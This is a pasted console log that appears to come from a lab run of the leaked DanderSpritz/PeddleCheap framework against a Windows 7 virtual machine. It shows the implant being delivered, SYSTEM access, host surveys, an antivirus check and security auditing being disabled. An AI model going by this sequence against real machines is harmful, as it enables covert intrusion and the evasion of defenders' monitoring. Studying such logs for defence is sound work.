Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [16:42:14] ID: 1 'script' started [target: z0.0.0.1]
- Loading module 154 (addr=z0.0.0.1 | type=dsz | file=Script_Lp.dll)
- Module loaded
- - --------------------------------------------------
- - Getting remote time
- - RETRIEVED
- Running command 'version'
- Compiled :
- Listening Post : 1.3.0
- Implant : 1.3.0
- Base :
- DSZ 1.3.0 (1.3.0.0)
- - --------------------------------------------------
- - Performing setup for i386-winnt on z0.0.0.1
- - --------------------------------------------------
- - DISABLED - Authentication (LOCAL)
- - DISABLED - DuplicateToken (LOCAL)
- - DISABLED - Authentication (CURRENT) "32-bit binary on 64-bit OS"
- - DISABLED - Oracle (LOCAL)
- - DISABLED - AppCompat (LOCAL)
- - DISABLED - InjectDll (LOCAL)
- - DISABLED - Pc_Status (LOCAL)
- - DISABLED - InjectDll (CURRENT) "32-bit binary on 64-bit OS"
- - DISABLED - Flav_Control (LOCAL)
- - DISABLED - kisu_install (CURRENT) "32-bit binary on 64-bit OS"
- - DISABLED - kisu_survey (CURRENT) "32-bit binary on 64-bit OS"
- - DISABLED - kisu_uninstall (CURRENT) "32-bit binary on 64-bit OS"
- - DISABLED - kisu_upgrade (CURRENT) "32-bit binary on 64-bit OS"
- - DISABLED - Break (LOCAL)
- - DISABLED - Psp_Avoidance (LOCAL) "32-bit binary on 64-bit OS"
- - DISABLED - QuitAndDelete (LOCAL)
- - DISABLED - Audit (LOCAL)
- - DISABLED - EventLogEdit (LOCAL)
- - DISABLED - GetAdmin (LOCAL)
- - DISABLED - Handles (LOCAL)
- - DISABLED - Hide (LOCAL)
- - DISABLED - Papercut (LOCAL)
- - DISABLED - PasswordDump (LOCAL)
- - DISABLED - Portmap (LOCAL)
- - DISABLED - ProcessModify (LOCAL)
- - DISABLED - ProcessOptions (LOCAL)
- - DISABLED - RunAsChild (LOCAL)
- - DISABLED - RunAsSystem (LOCAL)
- - DISABLED - Shutdown (LOCAL)
- - --------------------------------------------------
- - Registering Mcl_NtElevation options
- - SUCCESS
- - Registering Mcl_NtNativeApi options
- - SUCCESS
- - Setting Mcl_NtNativeApi Type
- - WIN32
- - Registering Mcl_NtMemory options
- - SUCCESS
- - Setting Mcl_NtMemory Type
- - DrNi
- - Registering Mcl_ThreadInject options
- - SUCCESS
- - Setting Mcl_ThreadInject Type
- - DrNi
- - Getting host information
- - RETRIEVED
- - Getting OS GUID information
- - RETRIEVED
- - Storing host information
- - STORED
- - DISABLED - Authentication (LOCAL)
- Unable to get target DB for unknown target
- - --------------------------------------------------
- - Registering global wrappers
- - --------------------------------------------------
- - hide - Windows kernel 6.0+ PatchGuard protection
- - packetredirect - Trigger failure alerter
- - --------------------------------------------------
- - Added Ops library to Python search path.
- - Local CP address is z0.0.0.1.
- - Setting environment variable OPS_PROJECTNAME to 'win7op'
- - Could not find DSZOpsDisk zip. Disk version NOT recorded.
- - 1 of 8 startup items indicated failure to execute correctly.
- - Session did not pass configuration sanity check. Close, clean up if necessary, and try again.
- [16:42:46] ID: 134 'pc_listen' started [target: z0.0.0.1]
- Loading module 158 (addr=z0.0.0.1 | type=dsz | file=PeddleCheap_Lp.dll)
- Module loaded
- Waiting for connection...
- Setting Sockopt
- Listening on [0.0.0.0]:443.
- Setting Sockopt
- Listening on [0.0.0.0]:80.
- Setting Sockopt
- Listening on [0.0.0.0]:53.
- Setting Sockopt
- Listening on [0.0.0.0]:1509.
- Connection received from [192.168.1.58]:49172 to [192.168.1.3]:443...
- Connection accepted
- Starting session...
- PC LP Version: 2.3.0
- LP...ready to send the MAGIC NUMBER
- Sending additional 363 bytes of random
- LP ...ready to receive the symmetric key
- LP...ready to decrypt the key
- Remote Information
- PC Version : 2.3.0
- PC Id : 0x0000000000000000
- Arch-Os : i386-winnt (compiled i386-winnt)
- Session Key : ca 43 78 e9 9b f8 94 24 00 1d 26 37 52 eb ee 62
- Getting remote OS information
- Remote OS
- Arch : i386
- Compiled Arch : i386
- Platform : winnt
- Compiled Platform : winnt
- Version : 6.1 (Windows 7)
- Service Pack : 1
- C Lib Version : 6.0.0
- Sending OS version check status to remote side (4 bytes)
- Data (OS version check status) has been sent
- Data (OS version check status) has been received and stored by remote side
- Ready to send implant
- Successfully loaded LP DLLs
- Payload
- File Name : C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll
- Send payload : true
- Original Size : 248832
- Send Size : 137488
- Checksum : c745
- Name :
- Path :
- Export : #1
- Sending PayloadInfo run type information
- Sending File/Library info to remote side (36 bytes)
- Data (File/Library info) has been sent
- Data (File/Library info) has been received and stored by remote side
- Sending Export name to remote side (3 bytes)
- Data (Export name) has been sent
- Data (Export name) has been received and stored by remote side
- Sending Payload to remote side (137488 bytes)
- Data (Payload) has been sent
- Data (Payload) has been received and stored by remote side
- ... Receiving Acknowledgements
- Received successful status message for Dll/Exe loaded
- Received successful status message for About to run payload
- Received successful status message for Exit This Message Loop
- Setting remote address to z0.0.0.11
- Remote Address : z0.0.0.11
- Architecture : i386
- Compiled Architecture : i386
- Platform : winnt
- Version : 6.1.1 (build 7601)
- C Library Version : 6.0.0
- Process Id : 448
- Type : Dsz
- Metadata : type=PC local=192.168.1.3:443 remote=192.168.1.58:49172
- - Remote host is i386-winnt (6.1.1)
- - --------------------------------------------------
- - Performing setup for i386-winnt on z0.0.0.11
- - --------------------------------------------------
- - PROMPTED - Shutdown (CURRENT)
- - Registering Mcl_NtElevation options
- - SUCCESS
- - Setting Mcl_NtElevation Type
- - EpMe_GrSa
- - Registering Mcl_NtNativeApi options
- - SUCCESS
- - Setting Mcl_NtNativeApi Type
- - WIN32
- - Registering Mcl_NtMemory options
- - SUCCESS
- - Setting Mcl_NtMemory Type
- - Std
- - Registering Mcl_ThreadInject options
- - SUCCESS
- - Setting Mcl_ThreadInject Type
- - Std
- Unable to get target DB for unknown target
- Able to load audit plugin, NT_ELEVATION loaded correctly, moving on
- - Current process options (0x4d)
- - DisableExceptionChainValidation
- - DisableThunkEmulation
- - ExecutionDisabled
- - Permanent
- Do you want to modify the process options?
- YES
- - Verifying elevated 'query' results in 0x4d
- - PASSED
- - Modifying process options
- - Process options modified
- - DISABLED - Authentication (CURRENT)
- - --------------------------------------------------
- - Getting remote time
- - RETRIEVED
- - Getting host information
- - RETRIEVED
- - Getting OS GUID information
- - RETRIEVED
- - Storing host information
- - STORED
- - User is SYSTEM
- -
- --------------------------------------------------
- Running command 'python Connected/Connected.py -project Ops'
- Unable to get target DB for unknown target
- - --------------------------------------------------
- - Re-registering global wrappers for current target
- - --------------------------------------------------
- - hide - Windows kernel 6.0+ PatchGuard protection
- - packetredirect - Trigger failure alerter
- - --------------------------------------------------
- Showing you what we know so you can make a good decision in the menu below
- crypto_guid: 6b166207-b512-4e13-8840-14fba0047b28
- hostname: IE11Win7
- macs: [u'08-00-27-61-eb-58']
- implant_id: 0x0000000000000000
- Below match threshold or multiple matches. You must choose. Choose wisely.
- 0) None of these - create a new target db
- 1) (Confidence: 0.8) explorenewworlds / IE11Win7 / PC ID 0x0000000000000000 / 6b166207-b512-4e13-8840-14fba0047b28 / MACS: ['08-00-27-61-eb-58']
- 2) (Confidence: 0.8) test / IE11Win7 / PC ID 0x0000000000000000 / 6b166207-b512-4e13-8840-14fba0047b28 / MACS: ['08-00-27-61-eb-58']
- Enter selection:
- 0
- - [2017-04-28 09:48:08 z0.0.0.11] This looks like a new target, and I have no idea where to put it.
- 0) Input project name manually
- 1) dszopsdisk
- 2) dszopsdisk-1
- 3) explorenewworlds
- 4) explornewworlds
- 5) guirequestlog
- 6) guisystemlog
- 7) logs
- 8) op1
- 9) test
- 10) win7op
- Enter selection:
- 10
- - [2017-04-28 09:48:14 z0.0.0.11] Target ID completed, ID 60877f4d-baab-4ebe-a6b3-b2d6e7ebe044 (in project win7op)
- ====================================================================
- - [2017-04-28 09:48:15 z0.0.0.11] Showing ifconfig data so you can make sure you are on the correct target
- FQDN: IE11Win7
- DNS Servers: 192.168.1.1
- - [2017-04-28 09:48:16 z0.0.0.11] Showing all non-local and non-tunnel encapsulation adapter information, see command 222 for full interface list
- | Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
- +--------------------------------------+-------------------+--------------+---------------+---------------------------------+-------------+------------------------------------------------------------------+
- | Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-61-EB-58 | 192.168.1.58 | 255.255.255.0 | fe80::267f:20ff:fecc:26ba%%%%13 | 192.168.1.1 | Local Area Connection 2 ({A2692622-D935-45DD-BC6A-0FEA4F88524C}) |
- Running command 'survey -run C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Ops\Data\survey.xml -sections env-setup -quiet'
- Running command 'systemversion '
- Architecture : i386
- OS Family : winnt
- Version : 6.1 (Build 7601)
- Platform : Windows 7
- Service Pack : 1.0
- Extra Info : Service Pack 1
- Product Type : Workstation / Professional
- Terminal Services is installed, but only one interactive session is supported.
- Command completed successfully
- - [2017-04-28 09:48:18 z0.0.0.11] Loaded safety handlers from previous op(s)
- Command completed successfully
- Running command 'survey -run'
- - [2017-04-28 09:48:19 z0.0.0.11] ================================== Process list ==================================================================
- - [2017-04-28 09:48:22 z0.0.0.11] Data age: 01 seconds - data is fresh
- - | PID | PPID | Full Path | User | Comment |
- - +------+------+----------------------------------------------------------+------------------------------+------------------------------------------------------------+
- - | 0 | 0 | | | |
- - | 4 | 0 | System | | System Kernel |
- - | 224 | 4 | ---\SystemRoot\System32\smss.exe | NT AUTHORITY\SYSTEM | Session Manager Subsystem |
- - | 296 | 288 | C:\Windows\system32\csrss.exe | NT AUTHORITY\SYSTEM | Client-Server Runtime Server Subsystem |
- - | 344 | 336 | C:\Windows\system32\csrss.exe | NT AUTHORITY\SYSTEM | Client-Server Runtime Server Subsystem |
- - | 352 | 288 | C:\Windows\system32\wininit.exe | NT AUTHORITY\SYSTEM | Vista background service launcher |
- - | 440 | 352 | ---C:\Windows\system32\services.exe | NT AUTHORITY\SYSTEM | Windows Service Controller |
- - | 548 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- - | 616 | 440 | ------C:\Windows\system32\VBoxService.exe | NT AUTHORITY\SYSTEM | |
- - | 680 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- - | 784 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- - | 824 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- - | 2076 | 824 | ---------C:\Windows\system32\Dwm.exe | IE11WIN7\IEUser | Vista Desktop Window Manager |
- - | 848 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- - | 872 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- - | 1132 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- - | 1256 | 440 | ------C:\Windows\System32\spoolsv.exe | NT AUTHORITY\SYSTEM | Microsoft Printer Spooler Service |
- - | 1288 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- - | 1412 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\NETWORK SERVICE | |
- - | 1436 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\LOCAL SERVICE | |
- - | 1456 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\SYSTEM | |
- - | 1480 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\LOCAL SERVICE | |
- - | 1504 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\SYSTEM | |
- - | 1600 | 440 | ------C:\Windows\system32\wlms\wlms.exe | NT AUTHORITY\SYSTEM | |
- - | 1912 | 440 | ------C:\Windows\system32\sppsvc.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service |
- - | 252 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- - | 1652 | 440 | ------C:\Windows\system32\taskhost.exe | IE11WIN7\IEUser | Windows 7 Generic Host Process |
- - | 2636 | 440 | ------C:\Windows\system32\SearchIndexer.exe | NT AUTHORITY\SYSTEM | Microsoft search indexer |
- - | 2764 | 440 | ------C:\Program Files\Windows Media Player\wmpnetwk.exe | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service |
- - | 2936 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- - | 3616 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- - | 448 | 352 | ---C:\Windows\system32\lsass.exe | NT AUTHORITY\SYSTEM | Local Security Authority Server Subsystem |
- - | 456 | 352 | ---C:\Windows\system32\lsm.exe | NT AUTHORITY\SYSTEM | Vista Local Session Manager |
- - | 384 | 336 | C:\Windows\system32\winlogon.exe | NT AUTHORITY\SYSTEM | Microsoft Windows Logon Process |
- - | 2108 | 2056 | C:\Windows\Explorer.EXE | IE11WIN7\IEUser | Windows Explorer Shell |
- - | 2360 | 2108 | ---C:\Windows\System32\VBoxTray.exe | IE11WIN7\IEUser | |
- background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor \" "
- - [2017-04-28 09:48:23 z0.0.0.11] ===================================== Uptime =====================================================================
- Uptime: 0 days, 0:15:46
- - [2017-04-28 09:48:25 z0.0.0.11] ================== Auditing status check, dorking will be later ==================================================
- - [2017-04-28 09:48:25 z0.0.0.11] 1 safety handler registered for audit
- - [2017-04-28 09:48:26 z0.0.0.11] Data age: 00 seconds - data is fresh
- - [2017-04-28 09:48:27 z0.0.0.11] Auditing is enabled on this machine
- | Category | Success | Failure |
- +-----------------------------------+---------+---------+
- | System_SecurityStateChange | True | False |
- | System_Integrity | True | True |
- | System_Others | True | True |
- | Logon_Logon | True | False |
- | Logon_Logoff | True | False |
- | Logon_AccountLockout | True | False |
- | Logon_SpecialLogon | True | False |
- | Logon_NPS | True | True |
- | PolicyChange_AuditPolicy | True | False |
- | PolicyChange_AuthenticationPolicy | True | False |
- | AccountManagement_UserAccount | True | False |
- | AccountManagement_SecurityGroup | True | False |
- - [2017-04-28 09:48:27 z0.0.0.11] The above is only being shown for informational purposes, you will be prompted about dorking later
- - [2017-04-28 09:48:27 z0.0.0.11] =================================== Driver list ===================================================================
- Running command 'python C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"'
- - [2017-04-28 09:48:28 z0.0.0.11] 1 safety handler registered for drivers
- - | Driver | Path | Flags | Comment | Type | First Seen | Also On |
- - +------------------------------------------+-----------------------------+--------------------------+----------------------------------------------------+---------+------------+-------------------+
- - | api-ms-win-downlevel-normaliz-l1-1-0.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- - | api-ms-win-downlevel-user32-l1-1-0.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- - | dump_atapi.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
- - | dump_dumpata.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
- - | dump_dumpfve.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
- - | userenv.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- - | vboxdisp.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- - | vboxguest.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Guest Additions Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
- - | vboxmouse.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Mouse Filter Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
- - | vboxsf.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Shared Folders Minirdr Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
- - | vboxvideo.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Video Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
- Command completed successfully
- - [2017-04-28 09:48:53 z0.0.0.11] =============================== Installed software ===============================================================
- - --------------------------------------------------------------- Installer Packages ---------------------------------------------------------------
- - [2017-04-28 09:48:54 z0.0.0.11] Data age: 01 seconds - data is fresh
- | Arcitecture | Name | Description | Installed version | Date installed |
- +-------------+---------------------------------------------+-----------------------+-------------------+----------------+
- | 32-bit | Microsoft .NET Framework 4 Client Profile | Microsoft Corporation | 4.0.30319 | |
- | 32-bit | Microsoft .NET Framework 4 Client Profile | Microsoft Corporation | 4.0.30319 | 2014-11-21 |
- | 32-bit | Oracle VM VirtualBox Guest Additions 4.3.12 | Oracle Corporation | 4.3.12.0 | |
- - ----------------------------------------------------------------- Software key(s) -----------------------------------------------------------------
- - [2017-04-28 09:48:55 z0.0.0.11] Data age: 00 seconds - data is fresh
- | Architecture | Name | Last update |
- +--------------+------------------------+-------------+
- | 32-bit | ATI Technologies | 2009-07-14 |
- | 32-bit | Classes | 2014-11-26 |
- | 32-bit | Clients | 2009-07-14 |
- | 32-bit | Intel | 2009-07-14 |
- | 32-bit | Microsoft | 2017-04-28 |
- | 32-bit | MozillaPlugins | 2013-10-23 |
- | 32-bit | ODBC | 2009-07-14 |
- | 32-bit | Oracle | 2014-11-26 |
- | 32-bit | Policies | 2009-07-14 |
- | 32-bit | RegisteredApplications | 2009-07-14 |
- | 32-bit | Sonic | 2009-07-14 |
- - -------------------------------------------------------------- Program files dir(s) --------------------------------------------------------------
- - [2017-04-28 09:48:57 z0.0.0.11] Data age: 01 seconds - data is fresh
- | Architecture | Folder Name | Modified |
- +--------------+--------------------------+-------------------------------+
- | 32-bit | Common Files | 2009-07-14T02:37:05.485289900 |
- | 32-bit | DVD Maker | 2013-10-23T19:17:04.354000000 |
- | 32-bit | Internet Explorer | 2014-11-26T19:47:13.343750000 |
- | 32-bit | Microsoft.NET | 2013-10-23T17:55:12.097875000 |
- | 32-bit | MSBuild | 2009-07-14T04:52:30.938524700 |
- | 32-bit | Oracle | 2014-11-26T21:42:36.486305600 |
- | 32-bit | Reference Assemblies | 2009-07-14T04:52:30.938524700 |
- | 32-bit | Uninstall Information | 2009-07-14T04:53:23.912062200 |
- | 32-bit | Windows Defender | 2013-10-23T20:51:10.385625000 |
- | 32-bit | Windows Journal | 2014-11-22T01:41:33.521125000 |
- | 32-bit | Windows Mail | 2013-10-23T19:17:04.525875000 |
- | 32-bit | Windows Media Player | 2013-10-23T19:16:59.307125000 |
- | 32-bit | Windows NT | 2009-07-14T04:52:30.954124700 |
- | 32-bit | Windows Photo Viewer | 2013-10-23T19:16:59.213375000 |
- | 32-bit | Windows Portable Devices | 2013-10-23T19:16:59.338375000 |
- | 32-bit | Windows Sidebar | 2013-10-23T19:17:04.479000000 |
- - [2017-04-28 09:48:58 z0.0.0.11] ================================ Running services ================================================================
- - [2017-04-28 09:48:59 z0.0.0.11] Data age: 01 seconds - data is fresh
- | Display name | Service name |
- +--------------------------------------------------+----------------------+
- | Windows Audio Endpoint Builder | AudioEndpointBuilder |
- | Windows Audio | Audiosrv |
- | Base Filtering Engine | BFE |
- | Computer Browser | Browser |
- | Certificate Propagation | CertPropSvc |
- | Cryptographic Services | CryptSvc |
- | Offline Files | CscService |
- | DCOM Server Process Launcher | DcomLaunch |
- | DHCP Client | Dhcp |
- | DNS Client | Dnscache |
- | Diagnostic Policy Service | DPS |
- | Windows Event Log | eventlog |
- | COM+ Event System | EventSystem |
- | Function Discovery Provider Host | fdPHost |
- | Function Discovery Resource Publication | FDResPub |
- | Windows Font Cache Service | FontCache |
- | Group Policy Client | gpsvc |
- | HomeGroup Provider | HomeGroupProvider |
- | IKE and AuthIP IPsec Keying Modules | IKEEXT |
- | IP Helper | iphlpsvc |
- | Server | LanmanServer |
- | Workstation | LanmanWorkstation |
- | TCP/IP NetBIOS Helper | lmhosts |
- | Windows Firewall | MpsSvc |
- | Network Connections | Netman |
- | Network List Service | netprofm |
- | Network Location Awareness | NlaSvc |
- | Network Store Interface Service | nsi |
- | Plug and Play | PlugPlay |
- | IPsec Policy Agent | PolicyAgent |
- | Power | Power |
- | User Profile Service | ProfSvc |
- | RPC Endpoint Mapper | RpcEptMapper |
- | Remote Procedure Call (RPC) | RpcSs |
- | Security Accounts Manager | SamSs |
- | Task Scheduler | Schedule |
- | System Event Notification Service | SENS |
- | Remote Desktop Configuration | SessionEnv |
- | Shell Hardware Detection | ShellHWDetection |
- | Print Spooler | Spooler |
- | Software Protection | sppsvc |
- | SSDP Discovery | SSDPSRV |
- | Remote Desktop Services | TermService |
- | Themes | Themes |
- | Distributed Link Tracking Client | TrkWks |
- | Remote Desktop Services UserMode Port Redirector | UmRdpService |
- | Desktop Window Manager Session Manager | UxSms |
- | VirtualBox Guest Additions Service | VBoxService |
- | Hyper-V Heartbeat Service | vmicheartbeat |
- | Hyper-V Data Exchange Service | vmickvpexchange |
- | Hyper-V Guest Shutdown Service | vmicshutdown |
- | Hyper-V Time Synchronization Service | vmictimesync |
- | Hyper-V Volume Shadow Copy Requestor | vmicvss |
- | Diagnostic Service Host | WdiServiceHost |
- | Diagnostic System Host | WdiSystemHost |
- | Windows Defender | WinDefend |
- | WinHTTP Web Proxy Auto-Discovery Service | WinHttpAutoProxySvc |
- | Windows Management Instrumentation | Winmgmt |
- | Windows Licensing Monitoring Service | WLMS |
- | Windows Media Player Network Sharing Service | WMPNetworkSvc |
- | Security Center | wscsvc |
- | Windows Search | WSearch |
- | Windows Update | wuauserv |
- - [2017-04-28 09:49:00 z0.0.0.11] =================================== AV Check!!! ===================================================================
- Running command 'python windows\checkpsp.py -project Ops '
- - Checking for any running known PSP's...
- - microsoft
- -
- - Checking for target PSP history...
- - No target history found.
- - Saw PSP's we can act on. Running scripts.
- - ============================================
- - = microsoft =
- - ============================================
- - Checking for a change in configuration
- - The following PSPs were NEWLY ADDED to target:
- - Microsoft Windows Defender Windows 7 Enterprise
- - +--------------------+----------------------+
- - | | Setting Value |
- - +--------------------+----------------------+
- - | Vendor | Microsoft |
- - | Product | Windows Defender |
- - | Version | Windows 7 Enterprise |
- - | Definition Updates | None |
- - | Information | None |
- - | Install Date | None |
- - | Log File | None |
- - | Quarantine | None |
- - | ServiceStart | 2 |
- - | Software | PSP |
- - | SpyNet | 1 |
- - | Status | Enabled |
- - +--------------------+----------------------+
- Command completed successfully
- - [2017-04-28 09:49:11 z0.0.0.11] ================================ Auditing dorking ================================================================
- - [2017-04-28 09:49:11 z0.0.0.11] Data age: 45 seconds (from local cache, re-run manually if you need to)
- - [2017-04-28 09:49:11 z0.0.0.11] Auditing is enabled on this machine
- | Category | Success | Failure |
- +-----------------------------------+---------+---------+
- | System_SecurityStateChange | True | False |
- | System_Integrity | True | True |
- | System_Others | True | True |
- | Logon_Logon | True | False |
- | Logon_Logoff | True | False |
- | Logon_AccountLockout | True | False |
- | Logon_SpecialLogon | True | False |
- | Logon_NPS | True | True |
- | PolicyChange_AuditPolicy | True | False |
- | PolicyChange_AuthenticationPolicy | True | False |
- | AccountManagement_UserAccount | True | False |
- | AccountManagement_SecurityGroup | True | False |
- Do you want to dork security auditing?
- YES
- - [2017-04-28 09:49:34 z0.0.0.11] Security auditing dorked, do not stop command 311 or you will lose your blessing
- - [2017-04-28 09:49:34 z0.0.0.11] ==================================== Monitors ====================================================================
- Monitors
- -----------------------------
- 1) Full - arp, netstat, activity
- 2) Netstat and activity
- 3) Activity only
- 4) Done
- Select your monitors (full recommended for most situations): [1]
- Staring a monitor with activity -monitor
- - [2017-04-28 09:49:41 z0.0.0.11] Activity monitor started (or already running)
- Staring a monitor with netconnections -monitor
- - [2017-04-28 09:49:42 z0.0.0.11] Netconnections monitor started (or already running)
- z0.0.0.11: [2017-04-28 09:49:43] Hashhunter completed on IE11Win7!
- Staring a monitor with arp -delay 10s -monitor
- - [2017-04-28 09:49:44 z0.0.0.11] Arp monitor started (or already running)
- - [2017-04-28 09:49:45 z0.0.0.11] Process deep started in the background as command ID 329.
- - [2017-04-28 09:49:45 z0.0.0.11] Informational SIG check started in the background as command ID 330.
- - [2017-04-28 09:49:45 z0.0.0.11] ================================ Scheduler survey ================================================================
- - [2017-04-28 09:49:57 z0.0.0.11] Data age: 09 seconds (from local cache, re-run manually if you need to)
- | source | command | nextrun | triggers | runas | jobname |
- +---------+-------------------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------+-----------------------------------------------+-----------------------+------------------------------------------------------------------------------------------------------+
- | SERVICE | COM job ClassID and data: {BF5CB148-7C77-4D8A-A53E-D81C70CF743C} - | LOGON | LOGON | LEAST | Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) |
- | SERVICE | aitagent (runs in "") | DAILY 2007-10-08T02:30:00 | DAILY 2007-10-08T02:30:00 | SYSTEM LEAST | Application Experience\AitAgent |
- | SERVICE | %%%%windir%%%%\system32\rundll32.exe aepdu.dll,AePduRunUpdate (runs in "") | DAILY 2007-10-08T00:30:00 | DAILY 2007-10-08T00:30:00 | SYSTEM LEAST | Application Experience\ProgramDataUpdater |
- | SERVICE | %%%%windir%%%%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations (runs in "") | BOOT | BOOT | LOCAL SERVICE LEAST | Autochk\Proxy |
- | SERVICE | BthUdTask.exe $(Arg0) (runs in "") | | | SYSTEM LEAST | Bluetooth\UninstallDeviceTask |
- | SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - SYSTEM | EVENT , REGISTRATION , BOOT | EVENT , REGISTRATION , BOOT | SYSTEM LEAST | CertificateServicesClient\SystemTask |
- | SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - USER | EVENT , REGISTRATION , LOGON | EVENT , REGISTRATION , LOGON | LEAST | CertificateServicesClient\UserTask |
- | SERVICE | %%%%SystemRoot%%%%\System32\wsqmcons.exe (runs in "") | TIME 2004-01-02T00:00:00 | TIME 2004-01-02T00:00:00 | SYSTEM LEAST | Customer Experience Improvement Program\Consolidator |
- | SERVICE | COM job ClassID and data: {E7ED314F-2816-4C26-AEB5-54A34D02404C} - | WEEKLY 2008-09-01T03:30:00 | WEEKLY 2008-09-01T03:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\KernelCeipTask |
- | SERVICE | COM job ClassID and data: {C27F6B1D-FE0B-45E4-9257-38799FA69BC8} - SYSTEM | DAILY 2008-04-25T01:30:00 | DAILY 2008-04-25T01:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\UsbCeip |
- | SERVICE | %%%%windir%%%%\system32\defrag.exe -c (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | SYSTEM HIGHEST | Defrag\ScheduledDefrag |
- | SERVICE | COM job ClassID and data: {C1F85EF8-BCC2-4606-BB39-70C523715EB3} - | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | HIGHEST | Diagnosis\Scheduled |
- | SERVICE | %%%%windir%%%%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART (runs in "") | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | SYSTEM LEAST | DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector |
- | SERVICE | %%%%windir%%%%\System32\LocationNotifications.exe (runs in "") | EVENT | EVENT | LEAST | Location\Notifications |
- | SERVICE | COM job ClassID and data: {A9A33436-678B-4C9C-A211-7CC38785E79D} - | WEEKLY 2008-01-01T01:00:00 | WEEKLY 2008-01-01T01:00:00 | HIGHEST | Maintenance\WinSAT |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoActivateWindowsSearch (runs in "") | | | SYSTEM LEAST | Media Center\ActivateWindowsSearch |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (runs in "") | | | SYSTEM LEAST | Media Center\ConfigureInternetTimeService |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\DispatchRecoveryTasks |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DRMInit (runs in "") | | | LOCAL SERVICE LEAST | Media Center\ehDRMInit |
